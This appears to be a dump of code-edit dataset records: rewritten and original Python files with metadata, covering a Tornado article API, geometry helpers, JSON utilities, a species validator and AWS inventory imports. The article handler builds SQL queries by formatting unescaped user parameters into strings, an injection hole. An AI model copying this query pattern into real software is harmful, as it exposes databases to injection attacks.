            where1 += 'and subject_1 = "{}" '.format(subject1)
        if subject2 is not None:
            where1 += 'and subject_2 = "{}" '.format(subject2)
        if subject3 is not None:
            where1 += 'and subject_3 = "{}" '.format(subject3)
        if title is not None:
            where1 += 'and title = "{}" '.format(title)
        if tag1 is not None:
            where1 += 'and tag_1 = "{}" '.format(tag1)
        if tag2 is not None:
            where1 += 'and tag_2 = "{}" '.format(tag2)
        if tag3 is not None:
            where1 += 'and tag_3 = "{}" '.format(tag3)
        where1 = where1[4:]
        where2 = ''
        if filter is not None:
            where2 += 'author_login like "%{}%"'.format(filter)
            where2 += ' or author_name like "%{}%"'.format(filter)
            where2 += ' or subject_1 like "%{}%"'.format(filter)
            where2 += ' or subject_2 like "%{}%"'.format(filter)
            where2 += ' or subject_3 like "%{}%"'.format(filter)
            where2 += ' or title like "%{}%"'.format(filter)
            where2 += ' or tag_1 like "%{}%"'.format(filter)
            where2 += ' or tag_2 like "%{}%"'.format(filter)
            where2 += ' or tag_3 like "%{}%"'.format(filter)
        where = ''
        if where1:
            where += 'and {}'.format(where1)
        if where2:
            # BUGFIX: parenthesize the OR chain. Without parentheses, SQL
            # AND/OR precedence attached the exact-match conditions to only
            # the first LIKE clause, making the remaining LIKEs bypass them.
            where += 'and ({})'.format(where2)
        if where:
            where = where[4:]
        if where != '':
            where = 'WHERE ' + where
        total_count, result = await article_db.get_articles(where, pageable)
        self.set_header('X-Total-Count', total_count)
        self.write(json.dumps(result))
class ArticleApiB(tornado.web.RequestHandler):
    """Item-level REST API for articles: fetch (GET) and remove (DELETE) a
    single article by id. Both operations require ROLE_CONTENT."""
    def _lacks_content_role(self):
        # True when the caller's token does not carry ROLE_CONTENT.
        token = token_service.get_token(self.request)
        return not token.has_role('ROLE_CONTENT')
    async def get(self, id, *args, **kwargs):
        """Write the article with the given id, or 403 without the role."""
        if self._lacks_content_role():
            self.send_error(403)
            return
        result = await article_db.get_article(id)
        self.write(result)
    async def delete(self, id, *args, **kwargs):
        """Delete the article with the given id; 200 on success."""
        if self._lacks_content_role():
            self.send_error(403)
            return
        await article_db.delete_article(id)
        self.set_status(200)
        self.finish()
|
import json
import tornado.web
from app.domain.article import Article
from app.service import token_service
from app.database import article_db
from app.utils import mytime
class ArticleApiA(tornado.web.RequestHandler):
async def post(self, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
article = Article()
article.__dict__ = json.loads(str(self.request.body, encoding='utf-8'))
article.complete_attrs()
article.createdDate = mytime.now()
article.modifiedDate = mytime.now()
await article_db.create_article(article)
self.set_status(201)
self.finish()
async def put(self, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
article = Article()
article.__dict__ = json.loads(str(self.request.body, encoding='utf-8'))
article.modifiedDate = mytime.now()
await article_db.update_article(article)
self.set_status(201)
self.finish()
async def get(self, *args, **kwargs):
uuid = self.get_argument('uuid', None)
authorLogin = self.get_argument('authorLogin', None)
subject1 = self.get_argument('subject1', None)
subject2 = self.get_argument('subject2', None)
subject3 = self.get_argument('subject3', None)
title = self.get_argument('title', None)
tag1 = self.get_argument('tag1', None)
tag2 = self.get_argument('tag2', None)
tag3 = self.get_argument('tag3', None)
filter = self.get_argument('filter', None)
pageable = {
'page': self.get_argument('page', None),
'size': self.get_argument('size', None),
'sort': self.get_arguments('sort'),
}
if uuid is not None:
result = await article_db.get_articles_by_uuid(uuid)
self.write(json.dumps(result))
return
where1 = ''
if authorLogin is not None:
where1 += 'and author_login = "{}" '.format(authorLogin)
if subject1 is not None:
where1 += 'and subject_1 = "{}" '.format(subject1)
if subject2 is not None:
where1 += 'and subject_2 = "{}" '.format(subject2)
if subject3 is not None:
where1 += 'and subject_3 = "{}" '.format(subject3)
if title is not None:
where1 += 'and title = "{}" '.format(title)
if tag1 is not None:
where1 += 'and tag_1 = "{}" '.format(tag1)
if tag2 is not None:
where1 += 'and tag_2 = "{}" '.format(tag2)
if tag3 is not None:
where1 += 'and tag_3 = "{}" '.format(tag3)
where1 = where1[4:]
where2 = ''
if filter is not None:
where2 += 'author_login like "%{}%"'.format(filter)
where2 += ' or author_name like "%{}%"'.format(filter)
where2 += ' or subject_1 like "%{}%"'.format(filter)
where2 += ' or subject_2 like "%{}%"'.format(filter)
where2 += ' or subject_3 like "%{}%"'.format(filter)
where2 += ' or title like "%{}%"'.format(filter)
where2 += ' or tag_1 like "%{}%"'.format(filter)
where2 += ' or tag_2 like "%{}%"'.format(filter)
where2 += ' or tag_3 like "%{}%"'.format(filter)
where = ''
if where1:
where += 'and {}'.format(where1)
if where2:
where += 'and {}'.format(where2)
if where:
where = where[4:]
if where != '':
where = 'WHERE ' + where
total_count, result = await article_db.get_articles(where, pageable)
self.set_header('X-Total-Count', total_count)
self.write(json.dumps(result))
class ArticleApiB(tornado.web.RequestHandler):
async def get(self, id, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
result = await article_db.get_article(id)
self.write(result)
async def delete(self, id, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
await article_db.delete_article(id)
self.set_status(200)
self.finish()
|
none
| 1
| 2.104583
| 2
|
|
pyrival/geometry/lines.py
|
tusshar2000/PyRival
| 1
|
6627627
|
<gh_stars>1-10
import itertools
import math
# 2d line: ax + by + c = 0 is (a, b, c)
# ax + by + c = 0 ((a, b, c),
# 3d line: dx + ez + f = 0 is (d, e, f),
# gy + hz + i = 0 (g, h, i))
def gcd(x, y):
    """Greatest common divisor of x and y via Euclid's algorithm.

    Note: the sign of the result follows the recurrence (it can be
    negative for negative inputs), which callers rely on for
    canonicalization -- do not substitute math.gcd.
    """
    return gcd(y, x % y) if y else x
def get_2dline(p1, p2):
    """Return the reduced integer coefficients (a, b, c) of the 2d line
    a*x + b*y + c = 0 through p1 and p2, or (0, 0, 0) when the points
    coincide. The points are ordered first, so either argument order
    yields the same canonical triple."""
    if p1 == p2:
        return (0, 0, 0)
    lo, hi = min(p1, p2), max(p1, p2)
    a = hi[1] - lo[1]
    b = lo[0] - hi[0]
    c = lo[1] * hi[0] - lo[0] * hi[1]
    # Reduce by gcd(gcd(a, b), c), computed inline with Euclid's algorithm
    # (same sign semantics as the module-level gcd helper).
    g, r = a, b
    while r:
        g, r = r, g % r
    r = c
    while r:
        g, r = r, g % r
    return (a // g, b // g, c // g)
# Euclidean distance between two equal-length points.
dist = lambda p1, p2: sum((a - b) * (a - b) for a, b in zip(p1, p2))**0.5
# Build the 2d projections of the 3d line through p1 and p2, one per
# coordinate pair.
get_line = lambda p1, p2: map(get_2dline, itertools.combinations(p1, 2), itertools.combinations(p2, 2))
# Lines are parallel iff their normal vectors (a, b) are proportional.
is_parallel = lambda l1, l2: l1[0] * l2[1] == l2[0] * l1[1]
# Lines are identical iff all three pairwise coefficient cross-products
# vanish. BUGFIX: the original checked only b1*c2 == b2*c1, so two
# distinct vertical lines (b == 0), e.g. x = 0 and x = 1, compared as
# equal; the added a*c cross-product check closes that hole.
is_same = lambda l1, l2: (is_parallel(l1, l2) and
                          l1[1] * l2[2] == l2[1] * l1[2] and
                          l1[0] * l2[2] == l2[0] * l1[2])
collinear = lambda p1, p2, p3: is_same(get_2dline(p1, p2), get_2dline(p2, p3))
# Intersection point of two lines, or None when they are parallel.
intersect = (lambda l1, l2: None if is_parallel(l1, l2) else (
    (l2[1] * l1[2] - l1[1] * l2[2]) / (l2[0] * l1[1] - l1[0] * l2[1]),
    (l1[0] * l2[2] - l1[2] * l2[0]) / (l2[0] * l1[1] - l1[0] * l2[1]),
))
# Rotate point p by theta radians counter-clockwise about origin.
rotate = lambda p, theta, origin=(0, 0): (
    origin[0] + (p[0] - origin[0]) * math.cos(theta) - (p[1] - origin[1]) * math.sin(theta),
    origin[1] + (p[0] - origin[0]) * math.sin(theta) + (p[1] - origin[1]) * math.cos(theta),
)
|
import itertools
import math
# 2d line: ax + by + c = 0 is (a, b, c)
# ax + by + c = 0 ((a, b, c),
# 3d line: dx + ez + f = 0 is (d, e, f),
# gy + hz + i = 0 (g, h, i))
def gcd(x, y):
"""greatest common divisor of x and y"""
while y:
x, y = y, x % y
return x
def get_2dline(p1, p2):
if p1 == p2:
return (0, 0, 0)
_p1, _p2 = min(p1, p2), max(p1, p2)
a, b, c = _p2[1] - _p1[1], _p1[0] - _p2[0], _p1[1] * _p2[0] - _p1[0] * _p2[1]
g = gcd(gcd(a, b), c)
return (a // g, b // g, c // g)
dist = lambda p1, p2: sum((a - b) * (a - b) for a, b in zip(p1, p2))**0.5
get_line = lambda p1, p2: map(get_2dline, itertools.combinations(p1, 2), itertools.combinations(p2, 2))
is_parallel = lambda l1, l2: l1[0] * l2[1] == l2[0] * l1[1]
is_same = lambda l1, l2: is_parallel(l1, l2) and (l1[1] * l2[2] == l2[1] * l1[2])
collinear = lambda p1, p2, p3: is_same(get_2dline(p1, p2), get_2dline(p2, p3))
intersect = (lambda l1, l2: None if is_parallel(l1, l2) else (
(l2[1] * l1[2] - l1[1] * l2[2]) / (l2[0] * l1[1] - l1[0] * l2[1]),
(l1[0] * l2[2] - l1[2] * l2[0]) / (l2[0] * l1[1] - l1[0] * l2[1]),
))
rotate = lambda p, theta, origin=(0, 0): (
origin[0] + (p[0] - origin[0]) * math.cos(theta) - (p[1] - origin[1]) * math.sin(theta),
origin[1] + (p[0] - origin[0]) * math.sin(theta) + (p[1] - origin[1]) * math.cos(theta),
)
|
en
| 0.890085
|
# 2d line: ax + by + c = 0 is (a, b, c) # ax + by + c = 0 ((a, b, c), # 3d line: dx + ez + f = 0 is (d, e, f), # gy + hz + i = 0 (g, h, i)) greatest common divisor of x and y
| 3.479377
| 3
|
monasca_common/rest/utils.py
|
zhangjianweibj/monasca-common
| 0
|
6627628
|
# Copyright 2015 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
import ujson as json
from monasca_common.rest import exceptions
ENCODING = 'utf8'
TEXT_CONTENT_TYPE = 'text/plain'
JSON_CONTENT_TYPE = 'application/json'
def _try_catch(fun):
    """Decorator translating any exception raised by ``fun`` into
    exceptions.DataConversionException, preserving the original message."""
    @six.wraps(fun)
    def _wrapped(*args, **kwargs):
        try:
            return fun(*args, **kwargs)
        except Exception as err:
            raise exceptions.DataConversionException(str(err))
    return _wrapped
@_try_catch
def as_json(data, **kwargs):
    """Serialize data to a JSON string.
    :param dict data: data to convert to json
    :param kwargs kwargs: kwargs forwarded to json.dumps
    :return: json string
    :rtype: str
    """
    # Default to unsorted keys and raw (non-escaped) unicode output.
    kwargs.setdefault('sort_keys', False)
    kwargs.setdefault('ensure_ascii', False)
    return json.dumps(data, **kwargs)
@_try_catch
def from_json(data, **kwargs):
    """Parse a JSON string.
    :param str data: JSON document to parse
    :param kwargs kwargs: kwargs forwarded to json.loads
    :return: parsed data
    :rtype: dict
    """
    return json.loads(data, **kwargs)
# Maps each supported Content-Type to the callable that decodes a raw
# payload of that type; text/plain is passed through unchanged.
_READABLE_CONTENT_TYPES = {
    TEXT_CONTENT_TYPE: lambda content: content,
    JSON_CONTENT_TYPE: from_json
}
def read_body(payload, content_type=JSON_CONTENT_TYPE):
    """Reads HTTP payload according to given content_type.
    Function is capable of reading from payload stream.
    Read data is then processed according to content_type.
    Note:
        Content-Type is validated. It means that if read_body
        is not capable of reading data in the requested type,
        it will throw an exception.
        If the read data was empty, None (a falsy value) is
        returned to indicate that.
    Note:
        There is no transformation if content type is equal to
        'text/plain'. What has been read is returned.
    :param stream payload: payload to read, payload should have read method
    :param str content_type: payload content type, default to application/json
    :return: read data (type depends on content_type), or None if the
        payload was empty
    :exception: :py:class:`.UnsupportedContentTypeException` - if
        content_type is not one of the supported types
    :exception: :py:class:`.UnreadableContentError` - in case of any failure
        when reading data
    """
    if content_type not in _READABLE_CONTENT_TYPES:
        msg = ('Cannot read %s, not in %s' %
               (content_type, _READABLE_CONTENT_TYPES))
        raise exceptions.UnsupportedContentTypeException(msg)
    try:
        content = payload.read()
        if not content:
            return None
    except Exception as ex:
        raise exceptions.UnreadableContentError(str(ex))
    return _READABLE_CONTENT_TYPES[content_type](content)
|
# Copyright 2015 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
import ujson as json
from monasca_common.rest import exceptions
ENCODING = 'utf8'
TEXT_CONTENT_TYPE = 'text/plain'
JSON_CONTENT_TYPE = 'application/json'
def _try_catch(fun):
@six.wraps(fun)
def wrapper(*args, **kwargs):
try:
return fun(*args, **kwargs)
except Exception as ex:
raise exceptions.DataConversionException(str(ex))
return wrapper
@_try_catch
def as_json(data, **kwargs):
"""Writes data as json.
:param dict data: data to convert to json
:param kwargs kwargs: kwargs for json dumps
:return: json string
:rtype: str
"""
if 'sort_keys' not in kwargs:
kwargs['sort_keys'] = False
if 'ensure_ascii' not in kwargs:
kwargs['ensure_ascii'] = False
data = json.dumps(data, **kwargs)
return data
@_try_catch
def from_json(data, **kwargs):
"""Reads data from json str.
:param str data: data to read
:param kwargs kwargs: kwargs for json loads
:return: read data
:rtype: dict
"""
return json.loads(data, **kwargs)
_READABLE_CONTENT_TYPES = {
TEXT_CONTENT_TYPE: lambda content: content,
JSON_CONTENT_TYPE: from_json
}
def read_body(payload, content_type=JSON_CONTENT_TYPE):
"""Reads HTTP payload according to given content_type.
Function is capable of reading from payload stream.
Read data is then processed according to content_type.
Note:
Content-Type is validated. It means that if read_body
body is not capable of reading data in requested type,
it will throw an exception.
If read data was empty method will return false boolean
value to indicate that.
Note:
There is no transformation if content type is equal to
'text/plain'. What has been read is returned.
:param stream payload: payload to read, payload should have read method
:param str content_type: payload content type, default to application/json
:return: read data, returned type depends on content_type or False
if empty
:exception: :py:class:`.UnreadableBody` - in case of any failure when
reading data
"""
if content_type not in _READABLE_CONTENT_TYPES:
msg = ('Cannot read %s, not in %s' %
(content_type, _READABLE_CONTENT_TYPES))
raise exceptions.UnsupportedContentTypeException(msg)
try:
content = payload.read()
if not content:
return None
except Exception as ex:
raise exceptions.UnreadableContentError(str(ex))
return _READABLE_CONTENT_TYPES[content_type](content)
|
en
| 0.802362
|
# Copyright 2015 FUJITSU LIMITED # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. Writes data as json. :param dict data: data to convert to json :param kwargs kwargs: kwargs for json dumps :return: json string :rtype: str Reads data from json str. :param str data: data to read :param kwargs kwargs: kwargs for json loads :return: read data :rtype: dict Reads HTTP payload according to given content_type. Function is capable of reading from payload stream. Read data is then processed according to content_type. Note: Content-Type is validated. It means that if read_body body is not capable of reading data in requested type, it will throw an exception. If read data was empty method will return false boolean value to indicate that. Note: There is no transformation if content type is equal to 'text/plain'. What has been read is returned. :param stream payload: payload to read, payload should have read method :param str content_type: payload content type, default to application/json :return: read data, returned type depends on content_type or False if empty :exception: :py:class:`.UnreadableBody` - in case of any failure when reading data
| 1.870754
| 2
|
src/labeling/common.py
|
ZendriXXX/CMF
| 0
|
6627629
|
from enum import Enum
class LabelTypes(Enum):
    """Supported labeling strategies for a trace prefix."""
    NEXT_ACTIVITY = 'next_activity'
    ATTRIBUTE_STRING = 'label_attribute_string'
def add_label_column(trace, labeling_type, prefix_length: int):
    """Return the label for *trace* under the given labeling strategy.

    :param trace: for NEXT_ACTIVITY, a sequence of events; for
        ATTRIBUTE_STRING, an object exposing ``attributes['label']``.
    :param labeling_type: one of the LabelTypes(Enum) values.
    :param prefix_length: prefix position consumed by NEXT_ACTIVITY.
    :raises ValueError: if labeling_type is not a known LabelTypes value.
    """
    if labeling_type == LabelTypes.NEXT_ACTIVITY.value:
        return next_event_name(trace, prefix_length)
    if labeling_type == LabelTypes.ATTRIBUTE_STRING.value:
        return trace.attributes['label']
    # Narrowed from bare Exception to ValueError (still caught by callers
    # that handle Exception).
    raise ValueError('Label not set please select one of LabelTypes(Enum) values!')
def next_event_name(trace: list, prefix_length: int):
    """Return the 'concept:name' of the event at *prefix_length*,
    or 0 if prefix_length is out of range.
    """
    if prefix_length < len(trace):
        return trace[prefix_length]['concept:name']
    return 0
|
from enum import Enum
class LabelTypes(Enum):
    """Enumeration of the available trace-labeling strategies."""
    NEXT_ACTIVITY = 'next_activity'
    ATTRIBUTE_STRING = 'label_attribute_string'


def add_label_column(trace, labeling_type, prefix_length: int):
    """Compute the target label for *trace* according to *labeling_type*."""
    if labeling_type == LabelTypes.ATTRIBUTE_STRING.value:
        return trace.attributes['label']
    if labeling_type == LabelTypes.NEXT_ACTIVITY.value:
        return next_event_name(trace, prefix_length)
    raise Exception('Label not set please select one of LabelTypes(Enum) values!')


def next_event_name(trace: list, prefix_length: int):
    """Name ('concept:name') of the event at *prefix_length*; 0 when the trace is too short."""
    if prefix_length >= len(trace):
        return 0
    event = trace[prefix_length]
    return event['concept:name']
|
en
| 0.466859
|
TODO COMMENT ME Return the event event_name at prefix length or 0 if out of range.
| 3.046031
| 3
|
src/tests/test_with_function.py
|
sjsumitj/pytest_tutorial
| 1
|
6627630
|
import pytest
from ..sum import *
#make sure to start function name with test
def test_sum():
    # NOTE(review): `sum` is the project helper brought in via `from ..sum import *`,
    # which shadows the builtin (builtin sum(1, 2) would raise TypeError).
    assert sum(1, 2) == 3
|
import pytest
from ..sum import *
#make sure to start function name with test
def test_sum():
    # Exercises the two-argument `sum` from ..sum (star-import shadows the builtin).
    assert sum(1, 2) == 3
|
en
| 0.877947
|
#make sure to start function name with test
| 2.553595
| 3
|
src/sadie/typing/species.py
|
jwillis0720/pybody
| 0
|
6627631
|
from collections import UserString
from typing import Callable, Generator
from pydantic.fields import ModelField
# TODO: go through and see which are viable to use; tests need to be fixed first in test_g3 to handle this
# Mapping of accepted species identifiers -> canonical short name.
# Keys mix scientific names (e.g. "mus", "macaca_mulatta") and common names;
# values are the canonical form returned by Species.validate.
# NOTE(review): "rhesus" maps to "macaque" while "macaca_mulatta" maps to
# "rhesus" -- presumably intentional aliasing, but worth confirming.
SPECIES = {
    "rhesus": "macaque",
    "homo_sapiens": "human",
    "mus": "mouse",
    "rattus_norvegicus": "rat",
    "oryctolagus_cuniculus": "rabbit",
    "macaca_mulatta": "rhesus",
    "sus_scrofa": "pig",
    "vicugna_pacos": "alpaca",
    "bos_taurus": "cow",
    "alpaca": "alpaca",
    "human": "human",
    "macaque": "macaque",
    "mouse": "mouse",
    "rabbit": "rabbit",
    "dog": "dog",
    "cat": "cat",
    "rat": "rat",
    "pig": "pig",
    # Candidate species kept for reference (see TODO above): disabled until
    # the G3 tests can handle them.
    # 'amberjack': 'amberjack',
    # 'bass': 'bass',
    # 'boar': 'boar',
    # 'bull_shark': 'bull_shark',
    # 'camel': 'camel',
    # 'carp': 'carp',
    # 'catfish': 'catfish',
    # 'char': 'char',
    # 'chinese_perch': 'chinese_perch',
    # 'clearnose_skate': 'clearnose_skate',
    # 'cod': 'cod',
    # 'crab_eating_macaque': 'crab_eating_macaque',
    # 'dolphin': 'dolphin',
    # 'ferret': 'ferret',
    # 'flounder': 'flounder',
    # 'goat': 'goat',
    # 'goldfish': 'goldfish',
    # 'horn_shark': 'horn_shark',
    # 'horse': 'horse',
    # 'icefish': 'icefish',
    # 'junglefowl': 'junglefowl',
    # 'ladyfish': 'ladyfish',
    # 'little_skate': 'little_skate',
    # 'night_monkey': 'night_monkey',
    # 'nurse_shark': 'nurse_shark',
    # 'platypus': 'platypus',
    # 'pufferfish': 'pufferfish',
    # 'ratfish': 'ratfish',
    # 'rockcod': 'rockcod',
    # 'salmon': 'salmon',
    # 'sandbar_shark': 'sandbar_shark',
    # 'shark': 'shark',
    # 'sheep': 'sheep',
    # 'spotted_wolffish': 'spotted_wolffish',
    # 'trout': 'trout',
    # 'tubot': 'tubot',
    # 'wobbegong': 'wobbegong',
    # 'zebrafish': 'zebrafish',
}
class Species(UserString):
    """String-like type restricted to known species aliases (pydantic v1 validator)."""

    species = SPECIES

    @classmethod
    def __get_validators__(cls) -> Generator[Callable[[str, ModelField], str], None, None]:
        # pydantic v1 hook: yield the validator callables to run, in order.
        yield cls.validate

    @classmethod
    def validate(cls, value: str, field: ModelField) -> str:
        """Normalize *value* and resolve it to its canonical species name."""
        if not isinstance(value, str):
            raise ValueError(f"{field} [{value}] must be a string")
        # Canonical key form: trimmed, lower-case, spaces -> underscores.
        value = value.strip().lower().replace(" ", "_")
        if value in SPECIES:
            return SPECIES[value]
        raise ValueError(f"{field} [{value}] must be in {SPECIES.keys()}")
|
from collections import UserString
from typing import Callable, Generator
from pydantic.fields import ModelField
# TODO: go through and see which are viable to use; tests need to be fixed first in test_g3 to handle this
SPECIES = {
"rhesus": "macaque",
"homo_sapiens": "human",
"mus": "mouse",
"rattus_norvegicus": "rat",
"oryctolagus_cuniculus": "rabbit",
"macaca_mulatta": "rhesus",
"sus_scrofa": "pig",
"vicugna_pacos": "alpaca",
"bos_taurus": "cow",
"alpaca": "alpaca",
"human": "human",
"macaque": "macaque",
"mouse": "mouse",
"rabbit": "rabbit",
"dog": "dog",
"cat": "cat",
"rat": "rat",
"pig": "pig",
# 'amberjack': 'amberjack',
# 'bass': 'bass',
# 'boar': 'boar',
# 'bull_shark': 'bull_shark',
# 'camel': 'camel',
# 'carp': 'carp',
# 'catfish': 'catfish',
# 'char': 'char',
# 'chinese_perch': 'chinese_perch',
# 'clearnose_skate': 'clearnose_skate',
# 'cod': 'cod',
# 'crab_eating_macaque': 'crab_eating_macaque',
# 'dolphin': 'dolphin',
# 'ferret': 'ferret',
# 'flounder': 'flounder',
# 'goat': 'goat',
# 'goldfish': 'goldfish',
# 'horn_shark': 'horn_shark',
# 'horse': 'horse',
# 'icefish': 'icefish',
# 'junglefowl': 'junglefowl',
# 'ladyfish': 'ladyfish',
# 'little_skate': 'little_skate',
# 'night_monkey': 'night_monkey',
# 'nurse_shark': 'nurse_shark',
# 'platypus': 'platypus',
# 'pufferfish': 'pufferfish',
# 'ratfish': 'ratfish',
# 'rockcod': 'rockcod',
# 'salmon': 'salmon',
# 'sandbar_shark': 'sandbar_shark',
# 'shark': 'shark',
# 'sheep': 'sheep',
# 'spotted_wolffish': 'spotted_wolffish',
# 'trout': 'trout',
# 'tubot': 'tubot',
# 'wobbegong': 'wobbegong',
# 'zebrafish': 'zebrafish',
}
class Species(UserString):
    """User-string subtype whose value must be a known species alias (pydantic v1)."""
    # Exposes the alias -> canonical-name table on the class for convenience.
    species = SPECIES
    @classmethod
    def __get_validators__(cls) -> Generator[Callable[[str, ModelField], str], None, None]:
        # pydantic v1 hook: yields validators applied in order on assignment.
        yield cls.validate
    @classmethod
    def validate(cls, value: str, field: ModelField) -> str:
        """Normalize *value* (strip/lower/underscores) and map it to the canonical name.

        :raises ValueError: if *value* is not a string or not a known alias.
        """
        if not isinstance(value, str):
            raise ValueError(f"{field} [{value}] must be a string")
        value = value.strip().lower().replace(" ", "_")
        if value not in SPECIES:
            raise ValueError(f"{field} [{value}] must be in {SPECIES.keys()}")
        value = SPECIES[value]
        return value
|
en
| 0.130891
|
# TODO: go through and see which are viable to use; tests need to be fixed first in test_g3 to handle this # 'amberjack': 'amberjack', # 'bass': 'bass', # 'boar': 'boar', # 'bull_shark': 'bull_shark', # 'camel': 'camel', # 'carp': 'carp', # 'catfish': 'catfish', # 'char': 'char', # 'chinese_perch': 'chinese_perch', # 'clearnose_skate': 'clearnose_skate', # 'cod': 'cod', # 'crab_eating_macaque': 'crab_eating_macaque', # 'dolphin': 'dolphin', # 'ferret': 'ferret', # 'flounder': 'flounder', # 'goat': 'goat', # 'goldfish': 'goldfish', # 'horn_shark': 'horn_shark', # 'horse': 'horse', # 'icefish': 'icefish', # 'junglefowl': 'junglefowl', # 'ladyfish': 'ladyfish', # 'little_skate': 'little_skate', # 'night_monkey': 'night_monkey', # 'nurse_shark': 'nurse_shark', # 'platypus': 'platypus', # 'pufferfish': 'pufferfish', # 'ratfish': 'ratfish', # 'rockcod': 'rockcod', # 'salmon': 'salmon', # 'sandbar_shark': 'sandbar_shark', # 'shark': 'shark', # 'sheep': 'sheep', # 'spotted_wolffish': 'spotted_wolffish', # 'trout': 'trout', # 'tubot': 'tubot', # 'wobbegong': 'wobbegong', # 'zebrafish': 'zebrafish',
| 2.589187
| 3
|
node_map.py
|
couchbase/healthchecker
| 2
|
6627632
|
# Static mapping of internal node IPs -> externally reachable addresses.
# NOTE(review): "2172.16.58.33" is not a valid IPv4 address (extra leading
# digit) -- looks like a mangled entry; confirm against the cluster config.
address_map = {
    "10.12.87.41" : "2172.16.58.33",
    "10.12.95.171" : "192.168.3.11",
    "10.194.169.187" : "192.168.127.12",
    "10.12.98.26" : "23.20.50.242",
    "10.144.64.38" : "192.168.3.11",
    "10.12.97.189" : "172.16.58.3",
}
|
# Internal -> external node address translation table (duplicate copy).
# NOTE(review): first value "2172.16.58.33" is malformed IPv4 -- verify.
address_map = {
    "10.12.87.41" : "2172.16.58.33",
    "10.12.95.171" : "192.168.3.11",
    "10.194.169.187" : "192.168.127.12",
    "10.12.98.26" : "23.20.50.242",
    "10.144.64.38" : "192.168.3.11",
    "10.12.97.189" : "172.16.58.3",
}
|
none
| 1
| 1.563335
| 2
|
|
src/spaceone/inventory/manager/__init__.py
|
jean1042/plugin-aws-cloud-services
| 2
|
6627633
|
from spaceone.inventory.manager.cloudfront_manager import CloudFrontConnectorManager
from spaceone.inventory.manager.lambda_manager import LambdaConnectorManager
from spaceone.inventory.manager.rds_manager import RDSConnectorManager
from spaceone.inventory.manager.api_gateway_manager import APIGatewayConnectorManager
from spaceone.inventory.manager.auto_scaling_manager import AutoScalingConnectorManager
from spaceone.inventory.manager.direct_connect_manager import DirectConnectConnectorManager
from spaceone.inventory.manager.documentdb_manager import DocumentDBConnectorManager
from spaceone.inventory.manager.ecs_manager import ECSConnectorManager
from spaceone.inventory.manager.ecr_manager import ECRConnectorManager
from spaceone.inventory.manager.efs_manager import EFSConnectorManager
from spaceone.inventory.manager.eks_manager import EKSConnectorManager
from spaceone.inventory.manager.redshift_manager import RedshiftConnectorManager
from spaceone.inventory.manager.route53_manager import Route53ConnectorManager
from spaceone.inventory.manager.elasticache_manager import ElastiCacheConnectorManager
from spaceone.inventory.manager.sqs_manager import SQSConnectorManager
from spaceone.inventory.manager.kms_manager import KMSConnectorManager
from spaceone.inventory.manager.cloudtrail_manager import CloudTrailConnectorManager
from spaceone.inventory.manager.sns_manager import SNSConnectorManager
from spaceone.inventory.manager.secrets_manager import SecretsManagerConnectorManager
from spaceone.inventory.manager.elb_manager import ELBConnectorManager
from spaceone.inventory.manager.eip_manager import EIPConnectorManager
from spaceone.inventory.manager.ebs_manager import EBSConnectorManager
from spaceone.inventory.manager.s3_manager import S3ConnectorManager
from spaceone.inventory.manager.dynamodb_manager import DynamoDBConnectorManager
from spaceone.inventory.manager.vpc_manager import VPCConnectorManager
from spaceone.inventory.manager.ec2_manager import EC2ConnectorManager
from spaceone.inventory.manager.iam_manager import IAMConnectorManager
from spaceone.inventory.manager.acm_manager import ACMConnectorManager
from spaceone.inventory.manager.kinesis_data_stream_manager import KinesisDataStreamConnectorManager
from spaceone.inventory.manager.msk_manager import MSKConnectorManager
from spaceone.inventory.manager.kinesis_firehose_manager import KinesisFirehoseConnectorManager
# from spaceone.inventory.manager.workspace_manager import WorkspaceCollectorManager
|
from spaceone.inventory.manager.cloudfront_manager import CloudFrontConnectorManager
from spaceone.inventory.manager.lambda_manager import LambdaConnectorManager
from spaceone.inventory.manager.rds_manager import RDSConnectorManager
from spaceone.inventory.manager.api_gateway_manager import APIGatewayConnectorManager
from spaceone.inventory.manager.auto_scaling_manager import AutoScalingConnectorManager
from spaceone.inventory.manager.direct_connect_manager import DirectConnectConnectorManager
from spaceone.inventory.manager.documentdb_manager import DocumentDBConnectorManager
from spaceone.inventory.manager.ecs_manager import ECSConnectorManager
from spaceone.inventory.manager.ecr_manager import ECRConnectorManager
from spaceone.inventory.manager.efs_manager import EFSConnectorManager
from spaceone.inventory.manager.eks_manager import EKSConnectorManager
from spaceone.inventory.manager.redshift_manager import RedshiftConnectorManager
from spaceone.inventory.manager.route53_manager import Route53ConnectorManager
from spaceone.inventory.manager.elasticache_manager import ElastiCacheConnectorManager
from spaceone.inventory.manager.sqs_manager import SQSConnectorManager
from spaceone.inventory.manager.kms_manager import KMSConnectorManager
from spaceone.inventory.manager.cloudtrail_manager import CloudTrailConnectorManager
from spaceone.inventory.manager.sns_manager import SNSConnectorManager
from spaceone.inventory.manager.secrets_manager import SecretsManagerConnectorManager
from spaceone.inventory.manager.elb_manager import ELBConnectorManager
from spaceone.inventory.manager.eip_manager import EIPConnectorManager
